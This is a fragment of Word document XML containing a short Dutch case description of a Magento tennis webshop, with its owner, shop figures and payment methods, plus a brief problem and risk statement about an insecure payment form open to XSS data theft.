                              <w:t xml:space="preserve">Jan Willem van </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Oranje</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="3031CAF8" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Webshop</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>: online tennis shop</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0144500F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>URL</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>: www.onlinetennisshop.nl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="34BFF943" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Platform</w:t>
                            </w:r>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t>Magento</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="43CA4074" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Markt</w:t>
                            </w:r>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t>: Sportkleding, Tennis accessoires</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="41178190" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Aantal</w:t>
                            </w:r>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>klanten</w:t>
                            </w:r>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t>: 2500</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3DD2442F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Aantal producten</w:t>
                            </w:r>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t xml:space="preserve">: 700 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="468E94DE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Betaalmiddel</w:t>
                            </w:r>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t>Ideal</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t>/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t>paypal</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t>/creditcard</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="66F1E1A9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00EA3FCF" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:u w:val="single"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>Probleem</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="686B0881" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t xml:space="preserve">De webshop gebruikt een </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t>Magento</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t xml:space="preserve"> extensie die de transacties uitvoert het bevat een onveilig formulier waar klanten hun betaalgegevens invoeren.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D321D38" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00EA3FCF" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:u w:val="single"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EA3FCF">
                              <w:rPr>
                                <w:b/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Risico </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3697DDD0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="001D4F2E">
                              <w:t xml:space="preserve">Als een niets vermoedende klant zijn betaalgegevens invoeren kunnen hackers XSS-injecties uitvoeren om de gegevens te onderscheppen en te stelen.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FAA288" id="Text Box 9" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.55pt;margin-top:326.55pt;width:450pt;height:326.2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IAYcCAACJBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIW7VjrUhRB2KahAAB&#10;E8+uY9Nots+zr026v35nJykV44VpL8n5vu93H2fnrTVsp0KswZV8fDLiTDkJVe2eS/7j8erTF84i&#10;ClcJA06VfK8iP19+/HDW+IWawAZMpQIjJy4uGl/yDaJfFEWUG2VFPAGvHAk1BCuQnuG5qIJoyLs1&#10;xWQ0+lw0ECofQKoYiXvZCfky+9daSbzVOipkpuSUG+ZvyN91+hbLM7F4DsJvatmnIf4hCytqR0EP&#10;ri4FCrYN9V+ubC0DRNB4IsEWoHUtVa6BqhmPXlXzsBFe5VoInOgPMMX/51be7O4Cq6uSzzlzwlKL&#10;HlWL7Cu0bJ7QaXxckNKDJzVsiU1dHviRmKnoVgeb/lQOIznhvD9gm5xJYs5Ox7PRiESSZNPxdHI6&#10;zegXL+Y+RPymwLJElDxQ8zKmYncdkVIh1UElRXNwVRuTG2hcYkQwdZV4+ZEmSF2YwHaCeo9tzppc&#10;HGnRq7NUeVL6KKnirrJM4d6o5NC4e6UJqVzgGxGElMrhECVrJy1N+bzHsNdPpl1W7zE+WOTI4PBg&#10;bGsHIaOZV+sFmOrnkLLu9Anno7oTie26zSMyGxq/hmpP8xCg26fo5VVNPbsWEe9EoAWiPtNRwFv6&#10;aANNyaGnONtA+P0WP+nTXJOUs4YWsuTx11YExZn57mji5+MpTQzD/JjOTif0CMeS9bHEbe0FUN/H&#10;dH68zGTSRzOQOoB9otuxSlFJJJyk2DQoA3mB3Zmg2yPVapWVaGe9wGv34GVynVBOE/nYPong+7FF&#10;mvgbGFZXLF5Nb6ebLB2stgi6zqOdcO5Q7fGnfc8T39+mdFCO31nr5YIu/wAAAP//AwBQSwMEFAAG&#10;AAgAAAAhAHKGH2DjAAAADAEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwkAQhu8mvsNmTLzBtpLW&#10;WrslCiExBA+AIR6X7tg2dmeb7gLl7R1PepvJfPnn+4v5aDtxxsG3jhTE0wgEUuVMS7WCj/1qkoHw&#10;QZPRnSNUcEUP8/L2ptC5cRfa4nkXasEh5HOtoAmhz6X0VYNW+6nrkfj25QarA69DLc2gLxxuO/kQ&#10;Ram0uiX+0OgeFw1W37uTVfC2v663j4v31K5fl5+bg/SH1XKj1P3d+PIMIuAY/mD41Wd1KNnp6E5k&#10;vOgUTOI4ZlRBmsx4YCLLsicQR0ZnUZKALAv5v0T5AwAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA&#10;+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgA&#10;AAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgA&#10;AAAhACsvyAGHAgAAiQUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAG&#10;AAgAAAAhAHKGH2DjAAAADAEAAA8AAAAAAAAAAAAAAAAA3wQAAGRycy9kb3ducmV2LnhtbFBLBQYA&#10;AAAABAAEAPMAAADvBQAAAAA=&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6108C771" w14:textId="6BDE93A2" w:rsidR="00CE4BB5" w:rsidRPr="00E06AC7" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Eigenaar</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Jan Willem van </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Oranje</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="3031CAF8" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Webshop</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>: online tennis shop</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0144500F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>URL</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>: www.onlinetennisshop.nl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="34BFF943" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Platform</w:t>
                      </w:r>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t>Magento</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="43CA4074" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Markt</w:t>
                      </w:r>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t>: Sportkleding, Tennis accessoires</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="41178190" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Aantal</w:t>
                      </w:r>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>klanten</w:t>
                      </w:r>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t>: 2500</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3DD2442F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Aantal producten</w:t>
                      </w:r>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t xml:space="preserve">: 700 </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="468E94DE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Betaalmiddel</w:t>
                      </w:r>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t>Ideal</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t>/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t>paypal</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t>/creditcard</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="66F1E1A9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00EA3FCF" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>Probleem</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="686B0881" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t xml:space="preserve">De webshop gebruikt een </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t>Magento</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t xml:space="preserve"> extensie die de transacties uitvoert het bevat een onveilig formulier waar klanten hun betaalgegevens invoeren.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6D321D38" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00EA3FCF" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EA3FCF">
                        <w:rPr>
                          <w:b/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Risico </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3697DDD0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="001D4F2E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="001D4F2E">
                        <w:t xml:space="preserve">Als een niets vermoedende klant zijn betaalgegevens invoeren kunnen hackers XSS-injecties uitvoeren om de gegevens te onderscheppen en te stelen. </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B370754" w14:textId="02BDC7F4" w:rsidR="00940968" w:rsidRPr="00EB427C" w:rsidRDefault="008A79F1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F1B01">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="00940968">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B4673" w14:textId="77777777" w:rsidR="00940968" w:rsidRDefault="00940968" w:rsidP="00940968">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Samenvatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8289D5" w14:textId="77777777" w:rsidR="00870005" w:rsidRPr="00FB28E5" w:rsidRDefault="00870005" w:rsidP="00940968">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6A669E" w14:textId="77777777" w:rsidR="00940968" w:rsidRDefault="00940968" w:rsidP="00940968">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251848704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F117651" wp14:editId="6BF4DF15">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2206625</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1520190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1046480" cy="688340"/>
                <wp:effectExtent l="0" t="0" r="20320" b="22860"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21520"/>
                    <wp:lineTo x="21495" y="21520"/>
                    <wp:lineTo x="21495" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="503" name="Rectangle 503"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1046480" cy="68834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E4905AF" id="Rectangle 503" o:spid="_x0000_s1026" style="position:absolute;margin-left:173.75pt;margin-top:119.7pt;width:82.4pt;height:54.2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VhWqECAADTBQAADgAAAGRycy9lMm9Eb2MueG1srFRRTxsxDH6ftP8Q5X3ctRTWVVxRBWKahAAB&#10;E89pLulFysVZkvba/fo5yfXaMTZN0/qQxrH92f7O9sXlttVkI5xXYCo6OikpEYZDrcyqol+fbz5M&#10;KfGBmZppMKKiO+Hp5fz9u4vOzsQYGtC1cARBjJ91tqJNCHZWFJ43omX+BKwwqJTgWhZQdKuidqxD&#10;9FYX47I8LzpwtXXAhff4ep2VdJ7wpRQ83EvpRSC6ophbSKdL5zKexfyCzVaO2UbxPg32D1m0TBkM&#10;OkBds8DI2qlfoFrFHXiQ4YRDW4CUiotUA1YzKl9V89QwK1ItSI63A03+/8Hyu82DI6qu6Fl5Solh&#10;LX6kR6SNmZUWJD4iRZ31M7R8sg+ulzxeY71b6dr4j5WQbaJ1N9AqtoFwfByVk/PJFNnnqDufTk8n&#10;iffi4G2dD58FtCReKuowfmKTbW59wIhoujeJwTxoVd8orZMQW0VcaUc2DD/ycjXOrto2LD+dlviL&#10;ZSBMaqxonaVjIG3+BruHOTgiaPQsIkeZlXQLOy0injaPQiLByENObMggJ8c4FyaMUs6+YbXIz2e/&#10;zTkBRmSJBAzYPcDPXOyxc869fXQVaTIG5zJH/5Pz4JEigwmDc6sMuLcANFbVR872e5IyNZGlJdQ7&#10;bD8HeS695TcKO+CW+fDAHA4iNg0ul3CPh9TQVRT6GyUNuO9vvUd7nA/UUtLhYFfUf1szJyjRXwxO&#10;zqfRBPuPhCRMzj6OUXDHmuWxxqzbK8C2GuEaszxdo33Q+6t00L7gDlrEqKhihmPsivLg9sJVyAsH&#10;txgXi0Uyw+m3LNyaJ8sjeGQ1dvjz9oU5249BwAG6g/0SYLNX05Bto6eBxTqAVGlUDrz2fOPmSM3e&#10;b7m4mo7lZHXYxfMfAAAA//8DAFBLAwQUAAYACAAAACEAQGiuFd8AAAALAQAADwAAAGRycy9kb3du&#10;cmV2LnhtbEyPQU+DQBCF7yb+h82YeLNLoVhElkZN9GJ6aK16ncIIxN1ZZJeW/ntXL3qcvC/vfVOs&#10;JqPFgQbXWVYwn0UgiCtbd9wo2L08XmUgnEeuUVsmBSdysCrPzwrMa3vkDR22vhGhhF2OClrv+1xK&#10;V7Vk0M1sTxyyDzsY9OEcGlkPeAzlRss4iq6lwY7DQos9PbRUfW5Ho6DK1s/ufhpf9RMRxu+p+Tpt&#10;3pS6vJjubkF4mvwfDD/6QR3K4LS3I9dOaAXJYpkGVEGc3CxABCKdxwmI/W+UgSwL+f+H8hsAAP//&#10;AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRf&#10;VHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABf&#10;cmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAp9WFaoQIAANMFAAAOAAAAAAAAAAAAAAAAACwCAABk&#10;cnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBAaK4V3wAAAAsBAAAPAAAAAAAAAAAAAAAAAPkE&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAABQYAAAAA&#10;" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251847680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C1F2AC8" wp14:editId="42B901C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>245745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1522730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1958975" cy="2327275"/>
                <wp:effectExtent l="0" t="0" r="22225" b="34925"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21688"/>
                    <wp:lineTo x="21565" y="21688"/>
                    <wp:lineTo x="21565" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="502" name="Rectangle 502"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1958975" cy="2327275"/>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9068892" id="Rectangle 502" o:spid="_x0000_s1026" style="position:absolute;margin-left:19.35pt;margin-top:119.9pt;width:154.25pt;height:183.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fhBKACAADUBQAADgAAAGRycy9lMm9Eb2MueG1srFTBbtswDL0P2D8Iuq923GZtgjhF0KLDgKIN&#10;2g49K7IUG5BFTVLiZF8/SnLctOuGYVgOiiiSj+QzydnlrlVkK6xrQJd0dJJTIjSHqtHrkn57uvl0&#10;QYnzTFdMgRYl3QtHL+cfP8w6MxUF1KAqYQmCaDftTElr7800yxyvRcvcCRihUSnBtsyjaNdZZVmH&#10;6K3Kijz/nHVgK2OBC+fw9Top6TziSym4v5fSCU9USTE3H08bz1U4s/mMTdeWmbrhfRrsH7JoWaMx&#10;6AB1zTwjG9v8AtU23IID6U84tBlI2XARa8BqRvmbah5rZkSsBclxZqDJ/T9YfrddWtJUJR3nBSWa&#10;tfiRHpA2ptdKkPCIFHXGTdHy0SxtLzm8hnp30rbhHyshu0jrfqBV7Dzh+DiajC8m52NKOOqK0+K8&#10;QAFxshd3Y53/IqAl4VJSiwlEOtn21vlkejAJ0RyoprpplIpC6BVxpSzZMvzKq3WRXJWpWXo6zfHX&#10;R4ydFaxj/FdASv8NdsrmyBHLCJ5ZICnREm9+r0TAU/pBSGQYiUiJDRmk5BjnQvtRzNnVrBLpefzb&#10;nCNgQJZIwIDdA7zm4oCdcu7tg6uIozE45yn6n5wHjxgZtB+c20aDfQ9AYVV95GR/IClRE1haQbXH&#10;/rOQBtMZftNgB9wy55fM4iTizOJ28fd4SAVdSaG/UVKD/fHee7DHAUEtJR1Odknd9w2zghL1VePo&#10;TEZnZ2EVROFsfF6gYI81q2ON3rRXgG01wj1meLwGe68OV2mhfcYltAhRUcU0x9gl5d4ehCufNg6u&#10;MS4Wi2iG42+Yv9WPhgfwwGro8KfdM7OmHwOPE3QHhy3Apm+mIdkGTw2LjQfZxFF54bXnG1dHbPZ+&#10;zYXddCxHq5dlPP8JAAD//wMAUEsDBBQABgAIAAAAIQAJhhz03wAAAAoBAAAPAAAAZHJzL2Rvd25y&#10;ZXYueG1sTI/LTsMwEEX3SPyDNUjsqEMCaQiZVIAEG9RFy2vrxkMS4UeInTb9e4YVLEdzdO+51Wq2&#10;RuxpDL13CJeLBAS5xuvetQivL48XBYgQldPKeEcIRwqwqk9PKlVqf3Ab2m9jKzjEhVIhdDEOpZSh&#10;6ciqsPADOf59+tGqyOfYSj2qA4dbI9MkyaVVveOGTg300FHztZ0sQlOsn8P9PL2ZJyKVflzb7+Pm&#10;HfH8bL67BRFpjn8w/OqzOtTstPOT00EYhKx